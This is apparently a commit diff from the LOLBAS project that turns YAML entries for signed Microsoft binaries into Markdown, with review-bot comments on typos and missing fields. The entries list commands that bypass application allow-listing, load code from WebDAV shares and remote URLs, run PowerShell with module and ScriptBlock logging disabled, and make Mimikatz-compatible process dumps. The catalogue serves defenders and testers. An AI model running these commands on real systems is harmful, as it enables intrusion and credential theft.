mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2025-07-26 20:22:24 +02:00
MD files generate from Script, and adjustments to readme
24
OtherMSBinaries/Appvlp.exe.md
Normal file
@@ -0,0 +1,24 @@
## Appvlp.exe
* Functions: Execute
```

AppVLP.exe \\webdav\calc.bat
Executes calc.bat through AppVLP.exe

AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('calc.exe','', '', 'open', 1)"
Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command.

AppVLP.exe powershell.exe -c "$e=New-Object -ComObject excel.application;$e.RegisterXLL('\\webdav\xll_poc.xll')"
Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command.
```

* Resources:
* https://github.com/MoooKitty/Code-Execution
* https://twitter.com/moo_hax/status/892388990686347264

* Full path:
* C:\Program Files\Microsoft Office\root\client\appvlp.exe
* C:\Program Files (x86)\Microsoft Office\root\client\appvlp.exe

* Notes: Thanks to fab - @0rbz_ (No record), Will - @moo_hax (Code Execution)
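Review bot: the generated Markdown in this hunk drops fields that the YAML source carried (Author, Created, Categories, Code Sample and Detection), so the Detection slot, the part of an entry defenders rely on, has no place in the new format; keep those fields in the generator output even when empty, or record in the README that they were dropped on purpose. Two smaller points in the same file: both powershell.exe descriptions read "and run the respective PS command" (should be "runs"), and the fenced block has no language tag and mixes each command with its prose description, so the descriptions render as code.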
@@ -1,22 +0,0 @@
---
Name: Appvlp.exe
Description: Execute
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: AppVLP.exe \\webdav\calc.bat
Description: Executes calc.bat through AppVLP.exe
- Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('calc.exe','', '', 'open', 1)"
Description: Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command.
- Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject excel.application;$e.RegisterXLL('\\webdav\xll_poc.xll')"
Description: Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command.
Full Path:
- C:\Program Files\Microsoft Office\root\client\appvlp.exe
- C:\Program Files (x86)\Microsoft Office\root\client\appvlp.exe
Code Sample: []
Detection: []
Resources:
- https://github.com/MoooKitty/Code-Execution
- https://twitter.com/moo_hax/status/892388990686347264
Notes: Thanks to fab - @0rbz_ (No record), Will - @moo_hax (Code Execution)
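Review bot: this hunk deletes the YAML source that the commit message says the Markdown was generated from, so after this commit the only copy of the entry is the rendered Markdown and there is no structured file to regenerate from when the script or template changes; keep the YAML alongside the generated .md so the structured data stays the source of truth.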
22
OtherMSBinaries/Bginfo.exe.md
Normal file
@@ -0,0 +1,22 @@
## Bginfo.exe
* Functions: Execute
```

bginfo.exe bginfo.bgi /popup /nolicprompt
Execute VBscript code that is referenced within the bginfo.bgi file.

"\\10.10.10.10\webdav\bginfo.exe" bginfo.bgi /popup /nolicprompt
Execute bginfo.exe from a WebDAV server.

"\\live.sysinternals.com\Tools\bginfo.exe" \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt
This style of execution may not longer work due to patch.
```

* Resources:
* https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/

* Full path:
* No fixed path

* Notes: Thanks to Oddvar Moe - @oddvarmoe
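Review bot: the third command's description "This style of execution may not longer work due to patch." should read "may no longer work", and it should name the patch or bginfo version that changed the behaviour so a reader can tell whether the UNC-path variant still applies to their environment.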
@@ -1,20 +0,0 @@
---
Name: Bginfo.exe
Description: Execute
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: bginfo.exe bginfo.bgi /popup /nolicprompt
Description: Execute VBscript code that is referenced within the bginfo.bgi file.
- Command: '"\\10.10.10.10\webdav\bginfo.exe" bginfo.bgi /popup /nolicprompt'
Description: Execute bginfo.exe from a WebDAV server.
- Command: '"\\live.sysinternals.com\Tools\bginfo.exe" \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt'
Description: This style of execution may not longer work due to patch.
Full Path:
- No fixed path
Code Sample: []
Detection: []
Resources:
- https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/
Notes: Thanks to Oddvar Moe - @oddvarmoe
19
OtherMSBinaries/Cdb.exe.md
Normal file
@@ -0,0 +1,19 @@
## Cdb.exe
* Functions: Execute
```

cdb.exe -cf x64_calc.wds -o notepad.exe
Launch 64-bit shellcode from the x64_calc.wds file using cdb.exe.
```

* Resources:
* http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html
* https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options
* https://gist.github.com/mattifestation/94e2b0a9e3fe1ac0a433b5c3e6bd0bda

* Full path:
* C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe
* C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\cdb.exe

* Notes: Thanks to Matt Graeber - @mattifestation
@@ -1,19 +0,0 @@
---
Name: Cdb.exe
Description: Execute
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: cdb.exe -cf x64_calc.wds -o notepad.exe
Description: Launch 64-bit shellcode from the x64_calc.wds file using cdb.exe.
Full Path:
- C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe
- C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\cdb.exe
Code Sample: []
Detection: []
Resources:
- http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html
- https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options
- https://gist.github.com/mattifestation/94e2b0a9e3fe1ac0a433b5c3e6bd0bda
Notes: Thanks to Matt Graeber - @mattifestation
@@ -1,18 +0,0 @@
---
Name: csi.exe
Description: Execute
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: csi.exe file
Description: Use csi.exe to run unsigned C# code.
Full Path:
- c:\Program Files (x86)\Microsoft Visual Studio\2017\Community\MSBuild\15.0\Bin\Roslyn\csi.exe
- c:\Program Files (x86)\Microsoft Web Tools\Packages\Microsoft.Net.Compilers.X.Y.Z\tools\csi.exe
Code Sample: []
Detection: []
Resources:
- https://twitter.com/subTee/status/781208810723549188
- https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/
Notes: Thanks to Casey Smith - @subtee
@@ -1,17 +0,0 @@
---
Name: dnx.exe
Description: Execute
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: dnx.exe consoleapp
Description: Execute C# code located in the consoleapp folder via 'Program.cs' and 'Project.json' (Note - Requires dependencies)
Full Path:
- N/A
Code Sample: []
Detection: []
Resources:
- https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/
Notes: Thanks to Matt Nelson - @enigma0x3
17
OtherMSBinaries/Dxcap.exe.md
Normal file
@@ -0,0 +1,17 @@
## Dxcap.exe
* Functions: Execute
```

Dxcap.exe -c C:\Windows\System32\notepad.exe
Launch notepad as a subprocess of Dxcap.exe
```

* Resources:
* https://twitter.com/harr0ey/status/992008180904419328

* Full path:
* c:\Windows\System32\dxcap.exe
* c:\Windows\SysWOW64\dxcap.exe

* Notes: Thanks to Matt harr0ey - @harr0ey
@@ -1,17 +0,0 @@
---
Name: Dxcap.exe
Description: Execute
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: Dxcap.exe -c C:\Windows\System32\notepad.exe
Description: Launch notepad as a subprocess of Dxcap.exe
Full Path:
- c:\Windows\System32\dxcap.exe
- c:\Windows\SysWOW64\dxcap.exe
Code Sample: []
Detection: []
Resources:
- https://twitter.com/harr0ey/status/992008180904419328
Notes: Thanks to Matt harr0ey - @harr0ey
22
OtherMSBinaries/Mftrace.exe.md
Normal file
@@ -0,0 +1,22 @@
## Mftrace.exe
* Functions: Execute
```

Mftrace.exe cmd.exe
Launch cmd.exe as a subprocess of Mftrace.exe.

Mftrace.exe powershell.exe
Launch cmd.exe as a subprocess of Mftrace.exe.
```

* Resources:
* https://twitter.com/0rbz_/status/988911181422186496 (Currently not accessible)

* Full path:
* C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x86
* C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x64
* C:\Program Files (x86)\Windows Kits\10\bin\x86
* C:\Program Files (x86)\Windows Kits\10\bin\x64

* Notes: Thanks to fabrizio - @0rbz_
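Review bot: the description under "Mftrace.exe powershell.exe" is copied from the cmd.exe entry and still says "Launch cmd.exe as a subprocess of Mftrace.exe."; it should read "Launch powershell.exe as a subprocess of Mftrace.exe." Also, the only resource link is marked "(Currently not accessible)", so the entry has no working reference; an archived copy or a second source would help.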
@@ -1,21 +0,0 @@
---
Name: Mftrace.exe
Description: Execute
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: Mftrace.exe cmd.exe
Description: Launch cmd.exe as a subprocess of Mftrace.exe.
- Command: Mftrace.exe powershell.exe
Description: Launch cmd.exe as a subprocess of Mftrace.exe.
Full Path:
- C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x86
- C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x64
- C:\Program Files (x86)\Windows Kits\10\bin\x86
- C:\Program Files (x86)\Windows Kits\10\bin\x64
Code Sample: []
Detection: []
Resources:
- https://twitter.com/0rbz_/status/988911181422186496 (Currently not accessible)
Notes: Thanks to fabrizio - @0rbz_
16
OtherMSBinaries/Msdeploy.exe.md
Normal file
@@ -0,0 +1,16 @@
## Msdeploy.exe
* Functions: Execute
```

msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand="c:\temp\calc.bat"
Launch calc.bat via msdeploy.exe.
```

* Resources:
* https://twitter.com/pabraeken/status/995837734379032576

* Full path:
* C:\Program Files (x86)\IIS\Microsoft Web Deploy V3\msdeploy.exe

* Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
@@ -1,16 +0,0 @@
---
Name: Msdeploy.exe
Description: Execute
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand="c:\temp\calc.bat"
Description: Launch calc.bat via msdeploy.exe.
Full Path:
- C:\Program Files (x86)\IIS\Microsoft Web Deploy V3\msdeploy.exe
Code Sample: []
Detection: []
Resources:
- https://twitter.com/pabraeken/status/995837734379032576
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
@@ -1,19 +0,0 @@
---
Name: msxsl.exe
Description: Execute
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: msxsl.exe customers.xml script.xsl
Description: Run COM Scriptlet code within the script.xsl file (local).
- Command: msxls.exe https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml
Description: Run COM Scriptlet code within the shellcode.xml(xsl) file (remote).
Full Path:
- N/A
Code Sample: []
Detection: []
Resources:
- https://twitter.com/subTee/status/877616321747271680
- https://github.com/3gstudent/Use-msxsl-to-bypass-AppLocker
Notes: Thanks to Casey Smith - @subTee (Finding), 3gstudent - @3gstudent (Remote)
@@ -1,15 +0,0 @@
---
Name: rcsi.exe
Description: Execute
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: rcsi.exe bypass.csx
Description: Use embedded C# within the csx script to execute the code.
Full Path: ''
Code Sample: []
Detection: []
Resources:
- https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/
Notes: Thanks to Matt Nelson - @enigma0x3
16
OtherMSBinaries/SQLToolsPS.exe.md
Normal file
@@ -0,0 +1,16 @@
## SQLToolsPS.exe
* Functions: Execute, evade logging
```

SQLToolsPS.exe -noprofile -command Start-Process calc.exe
Run PowerShell scripts and commands.
```

* Resources:
* https://twitter.com/pabraeken/status/993298228840992768

* Full path:
* C:\Program files (x86)\Microsoft SQL Server\130\Tools\Binn\sqlps.exe

* Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
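Review bot: the "Full path" entry for SQLToolsPS.exe ends in "\130\Tools\Binn\sqlps.exe", a different image name from the binary this file documents; the path should end in SQLToolsPS.exe or be marked unknown, otherwise anyone building an allow-list or a detection rule from this entry will key on the wrong file name.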
22
OtherMSBinaries/Sqldumper.exe.md
Normal file
@@ -0,0 +1,22 @@
## Sqldumper.exe
* Functions: Dump process
```

sqldumper.exe 464 0 0x0110
Dump process by PID and create a dump file (Appears to create a dump file called SQLDmprXXXX.mdmp).

sqldumper.exe 540 0 0x01100:40
0x01100:40 flag will create a Mimikatz compatibile dump file.
```

* Resources:
* https://twitter.com/countuponsec/status/910969424215232518
* https://twitter.com/countuponsec/status/910977826853068800
* https://support.microsoft.com/en-us/help/917825/how-to-use-the-sqldumper-exe-utility-to-generate-a-dump-file-in-sql-se

* Full path:
* C:\Program Files\Microsoft SQL Server\90\Shared\SQLDumper.exe
* C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis\AS OLEDB\140\SQLDumper.exe

* Notes: Thanks to Luis Rocha - @countuponsec
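Review bot: "compatibile" in the second description should be "compatible". The first description's "Appears to create a dump file called SQLDmprXXXX.mdmp" reads as unverified; confirm the naming against the linked Microsoft support article and state it plainly, since the output file name is what a detection rule would key on. The PIDs 464 and 540 are sample values and the descriptions could say so.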
@@ -1,21 +0,0 @@
---
Name: Sqldumper.exe
Description: Dump process
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: sqldumper.exe 464 0 0x0110
Description: Dump process by PID and create a dump file (Appears to create a dump file called SQLDmprXXXX.mdmp).
- Command: sqldumper.exe 540 0 0x01100:40
Description: 0x01100:40 flag will create a Mimikatz compatibile dump file.
Full Path:
- C:\Program Files\Microsoft SQL Server\90\Shared\SQLDumper.exe
- C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis\AS OLEDB\140\SQLDumper.exe
Code Sample: []
Detection: []
Resources:
- https://twitter.com/countuponsec/status/910969424215232518
- https://twitter.com/countuponsec/status/910977826853068800
- https://support.microsoft.com/en-us/help/917825/how-to-use-the-sqldumper-exe-utility-to-generate-a-dump-file-in-sql-se
Notes: Thanks to Luis Rocha - @countuponsec
16
OtherMSBinaries/Sqlps.exe.md
Normal file
@@ -0,0 +1,16 @@
## Sqlps.exe
* Functions: Execute, evade logging
```

Sqlps.exe -noprofile
Drop into a SQL Server PowerShell console without Module and ScriptBlock Logging.
```

* Resources:
* https://twitter.com/bryon_/status/975835709587075072

* Full path:
* C:\Program files (x86\Microsoft SQL Server\100\Tools\Binn\sqlps.exe

* Notes: Thanks to Bryon - @bryon_
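Review bot: the "Full path" line "C:\Program files (x86\Microsoft SQL Server\100\Tools\Binn\sqlps.exe" is missing the closing parenthesis after "x86" (the deleted Sqlps.exe YAML carries the same typo, so it predates the generator); it should read "C:\Program Files (x86)\Microsoft SQL Server\100\Tools\Binn\sqlps.exe", since a path-based allow-list or detection rule copied from here would never match.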
@@ -1,16 +0,0 @@
---
Name: Sqlps.exe
Description: Execute, evade logging
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: Sqlps.exe -noprofile
Description: Drop into a SQL Server PowerShell console without Module and ScriptBlock Logging.
Full Path:
- C:\Program files (x86\Microsoft SQL Server\100\Tools\Binn\sqlps.exe
Code Sample: []
Detection: []
Resources:
- https://twitter.com/bryon_/status/975835709587075072
Notes: Thanks to Bryon - @bryon_
@@ -1,16 +0,0 @@
---
Name: SQLToolsPS.exe
Description: Execute, evade logging
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: SQLToolsPS.exe -noprofile -command Start-Process calc.exe
Description: Run PowerShell scripts and commands.
Full Path:
- C:\Program files (x86)\Microsoft SQL Server\130\Tools\Binn\sqlps.exe
Code Sample: []
Detection: []
Resources:
- https://twitter.com/pabraeken/status/993298228840992768
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
@@ -1,15 +0,0 @@
---
Name: te.exe
Description: Execute
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: te.exe bypass.wsc
Description: Run COM Scriptlets (e.g. VBScript) by calling a Windows Script Component (WSC) file.
Full Path: ''
Code Sample: []
Detection: []
Resources:
- https://twitter.com/gn3mes1s/status/927680266390384640?lang=bg
Notes: Thanks to Giuseppe N3mes1s - @gN3mes1s
17
OtherMSBinaries/Tracker.exe.md
Normal file
@@ -0,0 +1,17 @@
## Tracker.exe
* Functions: Execute
```

Tracker.exe /d .\calc.dll /c C:\Windows\write.exe
Use tracker.exe to proxy execution of an arbitrary DLL into another process. Since tracker.exe is also signed it can be used to bypass application whitelisting solutions.
```

* Resources:
* https://twitter.com/subTee/status/793151392185589760
* https://attack.mitre.org/wiki/Execution

* Full path:
*

* Notes: Thanks to Casey Smith - @subTee
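Review bot: the "Full path" list renders as a bare "*" with nothing after it because the YAML had "Full Path: ''"; the generator should emit "N/A" (as the dnx.exe and msxsl.exe entries do) or skip the bullet when the value is empty. The same empty bullet appears in rcsi.exe.md and te.exe.md in this commit.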
@@ -1,17 +0,0 @@
---
Name: Tracker.exe
Description: Execute
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: Tracker.exe /d .\calc.dll /c C:\Windows\write.exe
Description: Use tracker.exe to proxy execution of an arbitrary DLL into another process. Since tracker.exe is also signed it can be used to bypass application whitelisting solutions.
Full Path: ''
Code Sample: []
Detection: []
Resources:
- https://twitter.com/subTee/status/793151392185589760
- https://attack.mitre.org/wiki/Execution

Notes: Thanks to Casey Smith - @subTee
@@ -1,16 +0,0 @@
---
Name: vsjitdebugger.exe
Description: Execute
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: Vsjitdebugger.exe calc.exe
Description: Executes calc.exe as a subprocess of Vsjitdebugger.exe.
Full Path:
- c:\windows\system32\vsjitdebugger.exe
Code Sample: []
Detection: []
Resources:
- https://twitter.com/pabraeken/status/990758590020452353
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
@@ -1,17 +0,0 @@
---
Name: winword.exe
Description: Execute
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: winword.exe /l dllfile.dll
Description: Launch DLL payload.
Full Path:
- c:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
Code Sample: []
Detection: []
Resources:
- https://twitter.com/vysecurity/status/884755482707210241
- https://twitter.com/Hexacorn/status/885258886428725250
Notes: Thanks to Vincent Yiu - @@vysecurity (Cmd), Adam - @Hexacorn (Internals)
18
OtherMSBinaries/csi.exe.md
Normal file
@@ -0,0 +1,18 @@
## csi.exe
* Functions: Execute
```

csi.exe file
Use csi.exe to run unsigned C# code.
```

* Resources:
* https://twitter.com/subTee/status/781208810723549188
* https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/

* Full path:
* c:\Program Files (x86)\Microsoft Visual Studio\2017\Community\MSBuild\15.0\Bin\Roslyn\csi.exe
* c:\Program Files (x86)\Microsoft Web Tools\Packages\Microsoft.Net.Compilers.X.Y.Z\tools\csi.exe

* Notes: Thanks to Casey Smith - @subtee
16
OtherMSBinaries/dnx.exe.md
Normal file
@@ -0,0 +1,16 @@
## dnx.exe
* Functions: Execute
```

dnx.exe consoleapp
Execute C# code located in the consoleapp folder via 'Program.cs' and 'Project.json' (Note - Requires dependencies)
```

* Resources:
* https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/

* Full path:
* N/A

* Notes: Thanks to Matt Nelson - @enigma0x3
20
OtherMSBinaries/msxsl.exe.md
Normal file
@@ -0,0 +1,20 @@
## msxsl.exe
* Functions: Execute
```

msxsl.exe customers.xml script.xsl
Run COM Scriptlet code within the script.xsl file (local).

msxls.exe https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml
Run COM Scriptlet code within the shellcode.xml(xsl) file (remote).
```

* Resources:
* https://twitter.com/subTee/status/877616321747271680
* https://github.com/3gstudent/Use-msxsl-to-bypass-AppLocker

* Full path:
* N/A

* Notes: Thanks to Casey Smith - @subTee (Finding), 3gstudent - @3gstudent (Remote)
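Review bot: the second command is spelled "msxls.exe" instead of "msxsl.exe", so it does not name the real image and a detection rule copied from it would miss the binary. It also passes the same raw.githubusercontent.com URL as both the XML input and the XSL stylesheet; if that is intentional (one file serving as both), the description should say so rather than leaving it to look like a paste error.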
16
OtherMSBinaries/rcsi.exe.md
Normal file
@@ -0,0 +1,16 @@
## rcsi.exe
* Functions: Execute
```

rcsi.exe bypass.csx
Use embedded C# within the csx script to execute the code.
```

* Resources:
* https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/

* Full path:
*

* Notes: Thanks to Matt Nelson - @enigma0x3
16
OtherMSBinaries/te.exe.md
Normal file
@@ -0,0 +1,16 @@
## te.exe
* Functions: Execute
```

te.exe bypass.wsc
Run COM Scriptlets (e.g. VBScript) by calling a Windows Script Component (WSC) file.
```

* Resources:
* https://twitter.com/gn3mes1s/status/927680266390384640?lang=bg

* Full path:
*

* Notes: Thanks to Giuseppe N3mes1s - @gN3mes1s
16
OtherMSBinaries/vsjitdebugger.exe.md
Normal file
@@ -0,0 +1,16 @@
## vsjitdebugger.exe
* Functions: Execute
```

Vsjitdebugger.exe calc.exe
Executes calc.exe as a subprocess of Vsjitdebugger.exe.
```

* Resources:
* https://twitter.com/pabraeken/status/990758590020452353

* Full path:
* c:\windows\system32\vsjitdebugger.exe

* Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
17
OtherMSBinaries/winword.exe.md
Normal file
@@ -0,0 +1,17 @@
## winword.exe
* Functions: Execute
```

winword.exe /l dllfile.dll
Launch DLL payload.
```

* Resources:
* https://twitter.com/vysecurity/status/884755482707210241
* https://twitter.com/Hexacorn/status/885258886428725250

* Full path:
* c:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

* Notes: Thanks to Vincent Yiu - @@vysecurity (Cmd), Adam - @Hexacorn (Internals)
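Review bot: the Notes line has a doubled at sign in "@@vysecurity"; it should be "@vysecurity". The description "Launch DLL payload." is also terser than the other entries; saying that the /l switch makes winword.exe load the named DLL would tell a defender what to look for on the command line.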